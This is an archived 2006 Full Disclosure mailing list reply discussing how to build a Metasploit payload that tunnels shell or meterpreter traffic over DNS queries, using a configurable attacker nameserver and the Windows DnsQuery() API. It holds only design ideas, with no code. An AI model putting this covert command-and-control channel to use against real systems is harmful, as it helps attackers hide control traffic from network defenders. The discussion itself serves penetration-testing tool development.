Home page logo

fulldisclosure logo Full Disclosure mailing list archives

Re: JavaScript get Internal Address (thanks to DanBUK)
From: Alexander Sotirov <asotirov () determina com>
Date: Mon, 14 Aug 2006 00:50:05 -0700

H D Moore wrote:
1) Create a metasploit payload for communicating with shell/meterpreter 
via DNS queries and replies. This will not be a 'small' payload by any 
means, but should be feasible for all DCERPC and browser bug exploits.

2) Develop a custom DNS server for *.msf.metasploit.com

3) Provide a registration page where you can request a username/password

How about a custom DNS server that takes queries like
*. and returns a SOA that points to the IP
address? This will force the client to contact the name server at
directly, avoiding the need for registration.

The problems with this are:

* Privacy concerns regarding the initial DNS request to msf.metasploit.com 
for the NS record of the attacker. Technically, this could violate a NDA 
if used on a penetration test.

The domain name in the payload will be configurable, so you can set it to
myowndomain.com instead of msf.metasploit.com. If you are a pentester, you can
probably afford to run your own nameserver.

* The framework console would need to bind to port 53 (r00t on unix) and 
be accessible from the internet.

The same is true for all browser exploits in the framework.

* It may not be that useful, but it does seem like a fun hack. With any 
luck, this can be accomplished using the built-in name resolution API in 

I think DNSAPI.DLL has all the functionality you need for the payload. Look at
WinDNS.h in the Platform SDK, specifically the DnsQuery() function. I just spent
an entire weekend reversing this dll, so I know it pretty well by now :-)


Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]